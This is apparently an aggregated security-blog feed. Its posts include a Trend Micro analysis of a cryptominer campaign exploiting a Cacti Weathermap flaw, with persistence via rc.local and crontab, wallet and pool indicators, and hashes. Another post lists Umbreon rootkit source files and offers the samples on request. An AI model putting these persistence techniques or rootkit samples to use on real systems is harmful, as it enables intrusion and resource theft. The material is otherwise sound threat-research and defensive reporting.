Home   Blog   Twitter   Database  

Police ask Google for location data to narrow suspect lists

Police intend to use location data from Google to work out which devices were being used near the scene of crimes.

Posted: 21 Mar 2018 | 6:50 am

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Legitimate and large-scale cryptocurrency mining operations often invest in dedicated hardware and electric consumption to make a profit. This doesn’t escape the attention of cybercriminals: Malicious cryptocurrency mining was so pervasive last year that it was the most detected network event in devices connected to home routers.

Through our incident response-related monitoring, we observed intrusion attempts whose indicators we’ve been able to correlate to a previous cryptocurrency-mining campaign that used the JenkinsMiner malware. The difference: this campaign targets Linux servers. It’s also a classic case of reused vulnerabilities, as it exploits a rather outdated security flaw whose patch has been available for nearly five years.

Feedback from Trend Micro’s Smart Protection Network indicates it’s an active campaign, primarily affecting Japan, Taiwan, China, the U.S., and India.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 1. Network intrusion attempts observed from the cryptocurrency-mining campaign
(December 2017 to mid-March 2018)

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux ServersFigure 2. Country distribution of the malicious cryptocurrency-mining campaign

Attack chain analysis
This campaign’s operators were exploiting CVE-2013-2618, a dated vulnerability in Cacti’s Network Weathermap plug-in, which system administrators use to visualize network activity. As to why they’re exploiting an old security flaw: Network Weathermap only has two publicly reported vulnerabilities so far, both from June 2014. It’s possible these attackers are taking advantage not only of a security flaw for which an exploit is readily available but also of patch lag that occurs in organizations that use the open-source tool.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 3. Threat indicators showing how the Weathermap vulnerability is exploited

As seen above, we can see that:

  1. The blurred part is the target web server/port.
  2. The file /plugins/weathermap/configs/conn.php is the resulting file from the persistent cross-site scripting (XSS) on /plugins/weathermap/php.
  3. The ideal targets are Linux web servers (although Cacti and the plug-in can be installed on Windows as well).

Aside from the initial conn.php, we observed a similar HTTP request applying to a page called ‘cools.php’:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 4. A similar HTTP request to cools.php

As seen above, these commands would be executed:

The watchd0g.sh file contains the following code:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 5. Code snapshot of watchd0g.sh

Code is written in /etc/rc.local, which means that each time a system is restarted, watchd0g.sh is executed. The modification of /etc/crontab results in watchd0g.sh being run every three minutes. It then modifies the Linux kernel parameter vm.nr_hugepages to the recommended value for mining Monero (XMR). It also ensures that the watchd0g.sh process runs or re-downloads and executes the file if it terminates.

Its main purpose is to download another file, dada.x86_64, (detected by Trend Micro as COINMINER_MALXMR.SM-ELF64) from the same server where watchd0g.sh was retrieved.

Analyzing the Linux XMRig miner
The final payload (dada.x86_64 as of 01/28/2018, earlier named as xig or nkrb) is a modified XMRig miner. XMRig is a legitimate, open-source XMR miner with multiple updated versions that supports both 32-bit and 64-bit Windows and Linux operating systems. XMRig displays the following when executed via command line:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Figure 6. dada.x86_64 executed via command line

XMRig should be executed along with a configuration file called ‘config.json’, or with parameters that specify/require details such as the algorithm to be used (CryptoNight/CryptoNight-Lite), maximum CPU usage, mining server, and login credentials (Monero wallet and password). The samples used in this attack were modified in a way that renders the configuration or parameters unnecessary. Everything is already embedded in its code. The command-line display also does not appear in most samples.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 7. Parameters supposedly specified/required by the miner

Following the Monero trail
We gathered five possible samples that led us to two unique login usernames, matching the Monero wallets where the mining pool payments are sent.

The attackers mined approximately 320 XMR or about $74,677 (as of March 21, 2018) based on the two wallets. Note that this is only a small portion of the profit for this entire campaign. Earlier reports of the same campaign uncovered $3 million worth of XMR from a single Monero wallet.

SHA256 Mining Server Username Password
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b pool[.]minexmr[.]com:443 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 xmr[.]krbpool[.]com:443 45AarDcdcDXXdT7aRt2dpoMwQdEj4WzLyS5YvD4zDBYRLQFKxudkJMdR98RmyqmSdD4gR4hZusqwmfk7gF439YmzCnFmKDj x
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x

Figure 8. Samples containing the Monero wallets

Conclusion and mitigation
The campaign’s attack chain requires the following:

The first two are almost a given, but the last three raise eyebrows: Why would one want to share network data publicly (Cacti)? Is the web server really being run as ‘root’?

Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments (with just a browser bookmark, for instance), it also does the same for threat actors. There are alternatives that do the same thing, but countermeasures should be taken to harden and secure the systems from compromise or abuse. Naturally, keeping systems updated with the latest patches (or employing virtual patching for legacy systems/networks) can also make it more difficult for potential attackers.

A proactive incident response strategy that includes actively hunting and responding to threats also helps provide more visibility into attacks that may be overlooked by traditional security solutions. Identifying the techniques also empowers organizations with actionable intelligence that can help create stronger benchmarks for response.

Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update. Trend Micro™ Deep Discovery Inspector™ protects customers from this attack via these DDI rule:

Trend Micro™ Deep Security and Vulnerability Protection protect users from threats that may target the aforementioned vulnerability (or use XSS attack) via the following DPI rules:

Trend Micro™ TippingPoint™ customers are protected from the aforementioned threat via this MainlineDV filter:

Indicators of Compromise
Trend Micro also identified the attacking IP addresses. However, since the nature of machines indicates they can be remotely controlled, it would not be worthwhile to list them. Our research also led us to a possible tool written in Python that was used in this campaign, using the HTTP User-Agent ‘python-requests/2.18.4’.

Related Hashes:

SHA256 Description
4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4 Bourne-Again shell script ASCII text executable
0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=7b9059fbf5f223af2bf1d83251d640e0f60bbe00 stripped
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=5722b052bfd047b57ec3710dd948bfc9ee7d7316 stripped
7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=9bc00ee0d5261d8bb29b753b8436a1c54bd19c94 stripped
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped

IP Addresses and URLs related to the malicious/modified XMRig Miner:

The post Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers appeared first on .

Posted: 21 Mar 2018 | 5:01 am

Creaking Chromebooks getting Meltdown protection soon

Chrome OS 66 to protect older Intel units, still working on ARM

Older Chromebook owners should keep an eye open for Chrome OS updates, because Google has announced they'll get Meltdown protection soon.…

Posted: 20 Mar 2018 | 8:58 pm

EDR – Not just for Large Enterprises?

When you think of Endpoint Detection and Response (EDR) tools, do you envision a CSI-style crime lab with dozens of monitors and people with eagle eye views of what their users and defenses are doing? For many, the idea of EDR seems like something for “the big players” with teams of highly trained people. This is based on the historical products and presentations of these tools in days gone by however, it’s no longer true.

What Changed?

For starters, threats and the need to investigate them to prevent a repeat of an outbreak or breach. Malware and attack methods became smarter to put it simply and stopping them became much more difficult. Threats don’t always look like threats anymore. The same type of attack might arrive through the web, email, as a different file type with a different name but with the same intent: avoid detection and compromise your endpoints.

Defenses have evolved as well, but as part of that growth another problem grew with it. More defenses means more reports, alerts and places to go to investigate and then remediate a threat. Economically, most organizations have not put more staff into the mix alongside this change. The “do more with less” mantra hasn’t left the minds of many, and the result is too many security practitioners drowning in noise and overwhelmed with management tools and data. Perhaps that’s why so many resort to simply re-imaging a machine instead of investigating or remediating a threat. It seems easier (and it probably is) for many. See our infographic ‘A Return to Endpoint Protection Platforms’ for more on how the use of disparate point tools increases operational complexity.

Lastly, the need to do things differently happened. The latest Gartner Market Guide for Endpoint Detection and Response shows a strong shift in the number of organizations that now consider EDR a need and plan to invest in it. Security Practitioners are shifting gears as the nature of threats and the need to know how they arrived, what they attempted to do and where else they may have attempted entry occurred.

It Doesn’t Have to Take a Village Anymore

Something else changed as these the landscape evolved – EDR solutions became easier and simpler to work with. EDR is no longer a tool that requires a dozen people or a Security Operations Center (SOC). Dashboard style management with prioritized, at-a-glance data has replaced lengthy reports and overwhelming alert volume. More integrated approaches have also cut down manual processes, replacing them with automated responses and automatic contextual insights. This also cuts complexity when delivered as part of an Endpoint Protection platform (EPP). For more details, watch a video on the role of EDR and Machine Learning and the Return to Endpoint Protection Platform Suites.

It no longer requires extensive training or expertise to use and realize value from EDR solutions. Security Practitioners can now simply log in, click to the heart of a threat and remediate it in a short period of time. Remediation can happen in as little as one click and setting traps, triggers and responses for future threats takes only a few minutes.

McAfee offers an integrated EDR solution that gives prioritized data and alerts with a dashboard view of your environment and makes it easy to click to the eye of a threat in seconds.  One of our customers was able to go from using spreadsheets and manual processes to getting data in seconds.

If you’re ready to see how easy and effective EDR can be, check out this video to see a Metasploit attack halted with a straight forward investigation.

The post EDR – Not just for Large Enterprises? appeared first on McAfee Blogs.

Posted: 20 Mar 2018 | 3:19 pm

Rootkit Umbreon / Umreon - x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro

There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)


Download Email me if you need the password  

File information

Part one (full package)

#File NameHash ValueFile Size (on Disk)Duplicate?
1.umbreon-ascii0B880E0F447CD5B6A8D295EFE40AFA376085 bytes (5.94 KiB)
2autoroot1C5FAEEC3D8C50FAC589CD0ADD0765C7281 bytes (281 bytes)
3CHANGELOGA1502129706BA19667F128B44D19DC3C11 bytes (11 bytes)
4cli.shC846143BDA087783B3DC6C244C2707DC5682 bytes (5.55 KiB)
5hideportsD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)Yes, of file promptlog
6install.sh9DE30162E7A8F0279E19C2C30280FFF85634 bytes (5.5 KiB)
7Makefile0F5B1E70ADC867DD3A22CA62644007E5797 bytes (797 bytes)
8portchecker006D162A0D0AA294C85214963A3D3145113 bytes (113 bytes)
9promptlogD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)
10readlink.c42FC7D7E2F9147AB3C18B0C4316AD3D81357 bytes (1.33 KiB)
11ReadMe.txtB7172B364BF5FB8B5C30FF528F6C51252244 bytes (2.19 KiB)
12setup694FFF4D2623CA7BB8270F5124493F37332 bytes (332 bytes)
13spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)Yes, of file spytty.sh
14umbreon.c91706EF9717176DBB59A0F77FE95241C1007 bytes (1007 bytes)
15access.c7C0A86A27B322E63C3C29121788998B8713 bytes (713 bytes)
16audit.cA2B2812C80C93C9375BFB0D7BFCEFD5B1434 bytes (1.4 KiB)
17chown.cFF9B679C7AB3F57CFBBB852A13A350B22870 bytes (2.8 KiB)
18config.h980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)
19config.h.dist980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)Yes, of file config.h
20dirs.c46B20CC7DA2BDB9ECE65E36A4F987ABC3639 bytes (3.55 KiB)
21dlsym.c796DA079CC7E4BD7F6293136604DC07B4088 bytes (3.99 KiB)
22exec.c1935ED453FB83A0A538224AFAAC71B214033 bytes (3.94 KiB)
23getpath.h588603EF387EB617668B00EAFDAEA393183 bytes (183 bytes)
24getprocname.hF5781A9E267ED849FD4D2F5F3DFB8077805 bytes (805 bytes)
25includes.hF4797AE4B2D5B3B252E0456020F58E59629 bytes (629 bytes)
26kill.cC4BD132FC2FFBC84EA5103ABE6DC023D555 bytes (555 bytes)
27links.c898D73E1AC14DE657316F084AADA58A02274 bytes (2.22 KiB)
28local-door.c76FC3E9E2758BAF48E1E9B442DB98BF8501 bytes (501 bytes)
29lpcap.hEA6822B23FE02041BE506ED1A182E5CB1690 bytes (1.65 KiB)
30maps.c9BCD90BEA8D9F9F6270CF2017F9974E21100 bytes (1.07 KiB)
31misc.h1F9FCC5D84633931CDD77B32DB1D50D02728 bytes (2.66 KiB)
32netstat.c00CF3F7E7EA92E7A954282021DD72DC41113 bytes (1.09 KiB)
33open.cF7EE88A523AD2477FF8EC17C9DCD7C028594 bytes (8.39 KiB)
34pam.c7A947FDC0264947B2D293E1F4D69684A2010 bytes (1.96 KiB)
35pam_private.h2C60F925842CEB42FFD639E7C763C7B012480 bytes (12.19 KiB)
36pam_vprompt.c017FB0F736A0BC65431A25E1A9D393FE3826 bytes (3.74 KiB)
37passwd.cA0D183BBE86D05E3782B5B24E2C964132364 bytes (2.31 KiB)
38pcap.cFF911CA192B111BD0D9368AFACA03C461295 bytes (1.26 KiB)
39procstat.c7B14E97649CD767C256D4CD6E4F8D452398 bytes (398 bytes)
40procstatus.c72ED74C03F4FAB0C1B801687BE200F063303 bytes (3.23 KiB)
41readwrite.cC068ED372DEAF8E87D0133EAC0A274A82710 bytes (2.65 KiB)
42rename.cC36BE9C01FEADE2EF4D5EA03BD2B3C05535 bytes (535 bytes)
43setgid.c5C023259F2C244193BDA394E2C0B8313667 bytes (667 bytes)
44sha256.h003D805D919B4EC621B800C6C239BAE0545 bytes (545 bytes)
45socket.c348AEF06AFA259BFC4E943715DB5A00B579 bytes (579 bytes)
46stat.cE510EE1F78BD349E02F47A7EB001B0E37627 bytes (7.45 KiB)
47syslog.c7CD3273E09A6C08451DD598A0F18B5701497 bytes (1.46 KiB)
48umbreon.hF76CAC6D564DEACFC6319FA167375BA54316 bytes (4.21 KiB)
49unhide-funcs.c1A9F62B04319DA84EF71A1B091434C644729 bytes (4.62 KiB)
50cryptpass.py2EA92D6EC59D85474ED7A91C8518E7EC192 bytes (192 bytes)
51environment.sh70F467FE218E128258D7356B7CE328F11086 bytes (1.06 KiB)
52espeon-connect.shA574C885C450FCA048E79AD6937FED2E247 bytes (247 bytes)
53espeon-shell9EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
54espeon.c499FF5CF81C2624B0C3B0B7E9C6D980D14899 bytes (14.55 KiB)
55listen.sh69DA525AEA227BE9E4B8D59ACFF4D717209 bytes (209 bytes)
56spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
57ssh-hidden.shAE54F343FE974302F0D31776B72D0987127 bytes (127 bytes)
58unfuck.c457B6E90C7FA42A7C46D464FBF1D68E2384 bytes (384 bytes)
59unhide-self.pyB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
60listen.shF5BD197F34E3D0BD8EA28B182CCE7270233 bytes (233 bytes)

part 2 (those listed in the Trend Micro article)
#File NameHash ValueFile Size (on Disk)
1015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28acA47E38464754289C0F4A55ED7BB556489375 bytes (9.16 KiB)
20751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53aF9BA2429EAE5471ACDE820102C5B81597512 bytes (7.34 KiB)
30a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
40ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ffB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
5122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e86709EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
6409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64aB4746BB5E697F23A5842ABCAED36C9146149 bytes (6 KiB)
74fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234D0D97899131C29B3EC9AE89A6D49A23E65160 bytes (63.63 KiB)
88752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784E7E82D29DFB1FC484ED277C70218781855564 bytes (54.26 KiB)
9991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b730885222B1863ACDC0068ED5D50590CF792DF057664 bytes (7.48 KiB)
10a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddfA977F68C59040E40A822C384D1CEDEB6176 bytes (176 bytes)
11aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809bDF320ED7EE6CCF9F979AEFE451877FFC26 bytes (26 bytes)
12acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa452584D552B5D22E40BDA23E6587B1BC532D6852 bytes (6.69 KiB)
13c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480087DD79515D37F7ADA78FF5793A42B7B11184 bytes (10.92 KiB)
14e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853BBEB18C0C3E038747C78FCAB3E0444E371940 bytes (70.25 KiB)

Posted: 20 Mar 2018 | 6:29 am

Equifax breach could be most costly in corporate history

NEW YORK/TORONTO (Reuters) – Equifax Inc (EFX.N) said it expects costs related to its massive 2017 data breach to surge by $275 million this year, suggesting the incident at the credit reporting bureau could turn out to be the most costly hack in corporate history.

The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.

“It looks like this will be the most expensive data breach in history,” said Larry Ponemon, chairman of Ponemon Institute, a research group that tracks costs of cyber attacks.

Total costs of the breach, which compromised sensitive data of some 247 million consumers, could be“well over $600 million,” after including costs to resolve government investigations into the incident and civil lawsuits against the firm, he said.

The post Equifax breach could be most costly in corporate history appeared first on CyberESI.

Posted: 2 Mar 2018 | 11:37 am

Deobfuscating a “Sophisticated” Mailer

“Sophisticated” in that the spammer obfuscated the mailer script quite well. He/she apparently put quite a bit of work into concealing and protecting their spamming activity. I normally don’t come across PHP mailers that are obfuscated this well.

Here’s what the incoming traffic to the PHP script looks like:

If the request is successfully processed then the following (more or less) gets returned:


After cleaning up the HTTP request body and separating the parameters, you can see that there’s five sets of parameters. Remember this for later.

Now let’s have a look at the PHP script. The top part contains a large base64-encoded blob. At the bottom you can see that it reads in the cookie value and uses it to XOR the second, shorter base64-encoded string.

I’m in the process of rewriting Converter so it’s a good time to put this new program to the test. Here’s what Reneo looks like when I de-XOR the string.

I get another layer of obfuscation so I just repeat the process.

This is the result. This function reads in the large blob at the top, splits everything into four characters, builds an extraction list, reorders it in a certain way, concatenates a base64 string, decodes it, then evals the result.

Here’s the final, deobfuscated mailer script. The interesting bits are at the beginning.

The mailer script reads in the POST body, sorts the variables and concatenates them, then XORs this value with a hardcoded key.

Let’s go through this step-by step. Based on the above five sets of parameters, the variables are:


Sorted and joined together it becomes:


This value is then XOR’d with the hardcoded key built into the script, e886f82a-1c47-4677-93a6-5181ff8b8977, which results in the following in hex. This is the XOR key to decrypt the POST request values.


If I take the values from the POST request, sort it by the same variable name then join the values together, it will look something like this (truncated base64-encoded string):


I then XOR this string with the key and get the mailing instructions which include the campaign info and recipients:

The spam message in this specific run looks like this:

The obfuscated PHP script can be found online (here and here). However, without the cookie value from the POST request, it would be very difficult to deobfuscate the PHP script. Additionally, the POST request cannot be deobfuscated without knowing the hardcoded XOR key in the PHP script. I’m fairly certain that the cookie value and XOR key will all be different for each compromised server which is probably why this is going under the radar.

Posted: 25 Feb 2018 | 6:19 pm

Freedome VPN For Mac OS X

Take a look at this:

F-Secure Freedome Mac OS X

F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.

Download or share.

On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am